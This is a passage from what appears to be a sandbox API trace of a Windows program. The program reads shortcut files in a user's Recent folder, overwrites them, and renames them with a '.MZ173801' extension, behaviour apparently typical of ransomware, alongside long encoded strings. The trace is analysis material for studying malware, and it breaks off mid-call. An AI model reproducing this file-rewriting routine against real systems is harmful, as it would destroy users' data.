lpNumberOfBytesRead=0x19f9b0*=0x2a1, lpOverlapped=0x0) returned 1 [0111.428] CloseHandle (hObject=0x3f4) returned 1 [0111.428] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sCm_S8YjQxWQT08.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\scm_s8yjqxwqt08.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.429] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x2a1, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x2a1, lpOverlapped=0x0) returned 1 [0111.430] CloseHandle (hObject=0x3f4) returned 1 [0111.430] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sCm_S8YjQxWQT08.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\scm_s8yjqxwqt08.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sCm_S8YjQxWQT08.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\scm_s8yjqxwqt08.lnk.mz173801")) returned 1 [0111.431] GetCurrentThreadId () returned 0x1358 [0111.431] GetCurrentThreadId () returned 0x1358 [0111.431] GetCurrentThreadId () returned 0x1358 [0111.431] GetCurrentThreadId () returned 0x1358 [0111.431] GetCurrentThreadId () returned 0x1358 [0111.431] GetCurrentThreadId () returned 0x1358 [0111.431] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeaeb64ea, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeaeb64ea, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeaeb64ea, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3a9, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="SFUO7aG.lnk", cAlternateFileName="")) returned 1 [0111.431] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0111.431] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0111.431] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\SFUO7aG.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\sfuo7ag.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeaeb64ea, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeaeb64ea, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeaeb64ea, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3a9)) returned 1 [0111.432] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.432] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0111.432] GetCurrentThreadId () returned 0x1358 [0111.432] GetCurrentThreadId () returned 0x1358 [0111.432] GetCurrentThreadId () returned 0x1358 [0111.432] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.432] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0111.433] GetCurrentThreadId () returned 0x1358 [0111.433] GetCurrentThreadId () returned 0x1358 [0111.433] GetCurrentThreadId () returned 0x1358 [0111.433] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\SFUO7aG.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\sfuo7ag.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.433] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0111.433] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.433] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3a9 [0111.433] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.433] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3a9, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3a9, lpOverlapped=0x0) returned 1 [0111.434] CloseHandle (hObject=0x3f4) returned 1 [0111.434] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\SFUO7aG.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\sfuo7ag.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.435] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3a9, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3a9, lpOverlapped=0x0) returned 1 [0111.436] CloseHandle (hObject=0x3f4) returned 1 [0111.437] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\SFUO7aG.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\sfuo7ag.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\SFUO7aG.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\sfuo7ag.lnk.mz173801")) returned 1 [0111.437] GetCurrentThreadId () returned 0x1358 [0111.437] GetCurrentThreadId () returned 0x1358 [0111.437] GetCurrentThreadId () returned 0x1358 [0111.437] GetCurrentThreadId () returned 0x1358 [0111.437] GetCurrentThreadId () returned 0x1358 [0111.437] GetCurrentThreadId () returned 0x1358 [0111.437] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e0f76d, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x99e0f76d, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x99e0f76d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2b5, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="sHCpH11jen-XYoy Od_.lnk", cAlternateFileName="SHCPH1~1.LNK")) returned 1 [0111.437] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0111.437] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0111.437] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sHCpH11jen-XYoy Od_.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\shcph11jen-xyoy od_.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e0f76d, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x99e0f76d, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x99e0f76d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2b5)) returned 1 [0111.438] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.438] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0111.438] GetCurrentThreadId () returned 0x1358 [0111.438] GetCurrentThreadId () returned 0x1358 [0111.438] GetCurrentThreadId () returned 0x1358 [0111.439] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.439] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 